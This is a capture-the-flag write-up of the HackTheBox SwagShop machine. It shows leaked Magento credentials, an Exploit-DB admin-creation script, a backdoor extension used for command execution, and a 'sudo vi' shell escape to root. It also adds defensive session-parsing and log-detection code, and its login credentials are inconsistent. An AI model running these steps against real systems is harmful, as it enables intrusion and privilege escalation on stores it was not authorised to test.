---
tags: HTB
---

# HackTheBox - SwagShop

![](https://www.hackthebox.eu/storage/avatars/23477a54b0a750374e281656d69e7661_thumb.png)

## Nmap

```nmap
>>> nmap -sC -sV -oA swagshop 10.10.10.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 21:50 CEST
Nmap scan report for 10.10.10.140
Host is up (0.062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.56 seconds
```

## HTTP - Apache - Magento

OK, the Magento cache under `/var/cache` is exposed and leaks the cached configuration, including the database credentials:

```json
{
  "default_setup": {
    "connection": {
      "host": "localhost",
      "username": "root",
      "password": "fMVWh7bDHpgZkyfqQXreTjU9",
      "dbname": "swagshop",
      "initStatements": "SET NAMES utf8",
      "model": "mysql4",
      "type": "pdo_mysql",
      "active": "1"
    }
  }
}
```

The session files are exposed as well.
In them we find the user Haris, who appears to be an admin of the Magento instance:

```
{s:7:"user_id";s:1:"1";s:9:"firstname";s:5:"Haris";s:8:"lastname";s:7:"Swagger";s:5:"email";s:17:"haris@htbswag.net";s:8:"username";s:5:"haris";s:8:"password";s:65:"8512c803ecf70d315b7a43a1c8918522:lBHk0AOG0ux8Ac4tcM1sSb1iD5BNnRJp"
```

Or alternatively the test user:

```
ource";N;s:26:"*_resourceCollectionName";s:21:"admin/user_collection";s:12:"*_cacheTag";b:0;s:19:"*_dataSaveAllowed";b:1;s:15:"*_isObjectNew";N;s:8:"*_data";a:15:{s:7:"user_id";s:1:"4";s:9:"firstname";s:9:"Firstname";s:8:"lastname";s:8:"Lastname";s:5:"email";s:17:"email@example.com";s:8:"username";s:5:"forme";s:8:"password" ;s:35:"0a8335493c9fccd648ba53c601e3d67c:rp";s:7:"created";s:19:"2019-05-08 06:55:40";s:8:"modified";N;s:7:"logdate";s:19:"2019-05-08 12:09:32";s:6:"lognum";s:2:"15";s:15:"reload_acl_flag";s:1:"0";s:9:"is_active";s:1:"1";s:5:"extra";N;s:8:"rp_token";N;s:19:"rp_token_created_at";s:19:"2019-05-08 06:55:40";}s:18:
```

Cracking forme's hash gives: `forme:rpforme`

## Passwords

| Email             | Username | Password                 |
| :---------------- | :------- | :----------------------- |
| email@example.com | forme    | rpforme                  |
| Email             | root     | fMVWh7bDHpgZkyfqQXreTjU9 |

## Admin Interfaces:

- http://10.10.10.140/downloader/
- http://10.10.10.140/index.php/admin/Cms_Wysiwyg/directive/index/
- http://10.10.10.140/index.php/customer/account/login/
- http://10.10.10.140/index.php/admin/

OK, we use 37977.py and then log in with forme:forme on http://10.10.10.140/index.php/admin/

```python
# Header of the Exploit-DB script 37977.py; only the target URL was changed for this box.
#Thanks to
# Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON
import requests
import base64
import sys

target = "http://10.10.10.140/index.php"
```

We are now logged in as admin.
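The two session fragments above are PHP `serialize()` output, the format Magento 1 uses for its file-based sessions. As an added example that is not part of the original write-up, here is a small parser for that format plus an audit helper that reports which sensitive admin fields a leaked session exposes (useful when triaging such a leak during incident response); the input is a constructed sample mirroring the `forme` record above.

```python
# Fields whose exposure in a leaked admin session matters most to a responder.
SENSITIVE_KEYS = {"password", "rp_token", "email"}


def php_unserialize(data, pos=0):
    """Parse the subset of PHP serialize() output found in Magento session
    files: s (string), i (int), b (bool), N (null), a (array).
    Lengths are byte counts in PHP, so `data` is assumed to be ASCII here.
    Returns (value, offset just past the parsed value)."""
    tag = data[pos]
    if tag == "N":                          # N;
        return None, pos + 2
    if tag in "ib":                         # i:42;  b:1;
        end = data.index(";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == "b" else num), end + 1
    if tag == "s":                          # s:<len>:"<bytes>";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                   # skip  :"
        return data[start:start + length], start + length + 2   # skip  ";
    if tag == "a":                          # a:<n>:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos, result = colon + 2, {}         # skip  :{
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            result[key], pos = php_unserialize(data, pos)
        return result, pos + 1              # skip  }
    raise ValueError("unsupported type %r at offset %d" % (tag, pos))


def audit_admin_session(blob):
    """Unserialize a Magento admin_user data array and report which sensitive
    fields it exposes and whether the stored hash has the md5:salt shape."""
    data, _ = php_unserialize(blob)
    exposed = sorted(k for k in SENSITIVE_KEYS if data.get(k))
    digest, _, salt = (data.get("password") or "").partition(":")
    return {"username": data.get("username"), "exposed": exposed,
            "hash_is_salted_md5": len(digest) == 32 and bool(salt)}


# Constructed sample modelled on the fields of the leaked 'forme' session above.
SAMPLE = ('a:6:{s:7:"user_id";s:1:"4";s:8:"username";s:5:"forme";'
          's:5:"email";s:17:"email@example.com";'
          's:8:"password";s:35:"0a8335493c9fccd648ba53c601e3d67c:rp";'
          's:9:"is_active";s:1:"1";s:8:"rp_token";N;}')

if __name__ == "__main__":
    print(audit_admin_session(SAMPLE))
```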
We can use https://github.com/lavalamp-/LavaMagentoBD to pop a shell :)

Upload the tgz via 'http://10.10.10.140/downloader/':

```bash
py3 - tmux % http --form POST 'http://10.10.10.140/index.php/lavalamp/index' 'c=id'
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: Keep-Alive
Content-Length: 54
Content-Type: text/html; charset=UTF-8
Date: Mon, 26 Aug 2019 11:49:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=100
Pragma: no-cache
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: frontend=fc66dfgdqh3qup6ac278bnj2l7; expires=Mon, 26-Aug-2019 12:49:04 GMT; Max-Age=3600; path=/; domain=10.10.10.140; HttpOnly
X-Frame-Options: SAMEORIGIN

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

> local.xml

```xml
<config>
  <global>
    <install>
      <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>
    </install>
    <crypt>
      <key><![CDATA[b355a9e0cd018d3f7f03607141518419]]></key>
    </crypt>
    <disable_local_modules>false</disable_local_modules>
    <resources>
      <db>
        <table_prefix><![CDATA[]]></table_prefix>
      </db>
      <default_setup>
        <connection>
          <host><![CDATA[localhost]]></host>
          <username><![CDATA[root]]></username>
          <password><![CDATA[fMVWh7bDHpgZkyfqQXreTjU9]]></password>
          <dbname><![CDATA[swagshop]]></dbname>
          <initStatements><![CDATA[SET NAMES utf8]]></initStatements>
          <model><![CDATA[mysql4]]></model>
          <type><![CDATA[pdo_mysql]]></type>
          <pdoType><![CDATA[]]></pdoType>
          <active>1</active>
        </connection>
      </default_setup>
    </resources>
    <session_save><![CDATA[files]]></session_save>
  </global>
  <admin>
    <routers>
      <adminhtml>
        <args>
          <frontName><![CDATA[admin]]></frontName>
        </args>
      </adminhtml>
    </routers>
  </admin>
</config>
```

## Own User

Once we have a shell: `cat user.txt` in `/home/haris`

`a448877277e82f05e5ddf9f90aefbac8`

## Own Root

`vi` can be run as root through `sudo`, so spawning a shell from inside it gives a root shell:

```
sudo vi /var/www/html/SakiiR
:set shell=/bin/bash
:!bash
cat /root/root.txt
```
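From the defender's side, every step of this chain leaves a trace in the Apache access log: the reads of `var/cache` and the session files, the extension upload through `/downloader/`, and the POST to a router front name (`lavalamp`) that no legitimate module registered. As an added example (not part of the original write-up), this Python snippet runs those three detection rules over constructed log lines; the allow-list of front names is an assumption, and a real deployment would derive it from its modules' config.xml files.

```python
import re

# Apache combined log format; only the fields the rules below need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Magento 1 paths that must never be served; here var/cache and the
# session files leaked the DB password and admin password hashes.
SENSITIVE_PREFIXES = ("/var/", "/app/etc/")

# Assumed allow-list of legitimate router front names (derive it from config.xml).
KNOWN_FRONTNAMES = {"admin", "catalog", "catalogsearch", "checkout", "cms",
                    "customer", "contacts", "review", "wishlist", "newsletter"}


def classify(line):
    """Return the alert tags raised by one access-log line ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    path = m["path"].split("?", 1)[0].lower()      # drop the query string
    method, status = m["method"], int(m["status"])
    tags = []
    # Rule 1: a 200 on var/ or app/etc/ means secrets were actually served.
    if path.startswith(SENSITIVE_PREFIXES) and status == 200:
        tags.append("sensitive-path-served")
    # Rule 2: a POST to Magento Connect Manager is an extension upload.
    if path.startswith("/downloader") and method == "POST":
        tags.append("magento-connect-upload")
    # Rule 3: a POST to a router name no module registered (a dropped module).
    if path.startswith("/index.php/") and method == "POST":
        frontname = path[len("/index.php/"):].split("/", 1)[0]
        if frontname and frontname not in KNOWN_FRONTNAMES:
            tags.append("unknown-frontname-post")
    return tags


def scan(log_text):
    """Run classify() over a whole log; return [(line_no, tags)] for hits only."""
    return [(no, tags) for no, line in enumerate(log_text.splitlines(), 1)
            if (tags := classify(line))]


# Constructed sample lines mirroring the requests made in this write-up;
# the last one is a correctly blocked request and raises nothing.
SAMPLE_LOG = """\
10.10.14.3 - - [26/Aug/2019:11:40:01 +0000] "GET /var/cache/mage--0/mage---config HTTP/1.1" 200 812 "-" "curl/7.64.0"
10.10.14.3 - - [26/Aug/2019:11:41:12 +0000] "GET /index.php/catalog/category/view/id/3/ HTTP/1.1" 200 9821 "-" "Mozilla/5.0"
10.10.14.3 - - [26/Aug/2019:11:47:30 +0000] "POST /downloader/index.php HTTP/1.1" 200 3344 "-" "Mozilla/5.0"
10.10.14.3 - - [26/Aug/2019:11:49:04 +0000] "POST /index.php/lavalamp/index HTTP/1.1" 200 54 "-" "HTTPie/1.0.2"
10.10.14.3 - - [26/Aug/2019:11:50:00 +0000] "GET /app/etc/local.xml HTTP/1.1" 403 278 "-" "curl/7.64.0"
"""
```

Running `scan(SAMPLE_LOG)` flags lines 1, 3 and 4 and stays silent on the normal catalog request and the blocked `local.xml` read.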